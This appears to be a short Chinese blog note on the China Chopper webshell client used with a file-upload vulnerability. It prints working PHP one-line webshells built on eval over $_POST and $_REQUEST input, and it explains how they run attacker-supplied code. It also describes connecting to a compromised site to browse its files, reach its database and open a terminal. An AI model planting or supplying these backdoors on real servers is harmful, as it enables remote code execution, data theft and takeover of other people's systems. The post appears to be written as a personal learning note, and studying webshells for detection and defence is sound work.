中国菜刀+文件上传漏洞一句话木马

本文介绍了如何使用中国菜刀工具通过POST请求连接服务器,进行文件管理和数据库管理,并探讨了PHP一句话木马的工作原理,特别是eval函数与$_POST[key]的应用。
<?php @eval($_POST['chopper']);?> <?php @eval($_REQUEST['cmd']);?>

REQUEST是在网页端输入变量访问,POST则是使用中国菜刀之3类的工具连接,C/S架构。
在这里插入图片描述
在这里插入图片描述
编辑shell的时候,主机写 localhost

egrep命令:查找文件内包含指定字符的文件。
在这里插入图片描述
中国菜刀的详细使用:

在这里插入图片描述
文件管理,查被上传木马网站的服务器文件架构
数据库管理,在编辑中配置完后,可以连接被上传木马网站的数据库(不知道,所以需要sql注入的方式)
虚拟终端,连接服务器的终端。
拿到了一个网站,并且挂马,用中国菜刀连接上。
我常使用的php一句话 <?php @eval($_POST[key]); ?> 很多时候都会把 一句话木马传到服务器上面 那么这是上面原理呢 eval函数 会将括号里面的代码通过php语言来进行执行 $_POST函数的意思就是来收集 请求方法为post 的名字为key表单里面的值 所以这个一句话木马的密码其实就是表单的名字

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值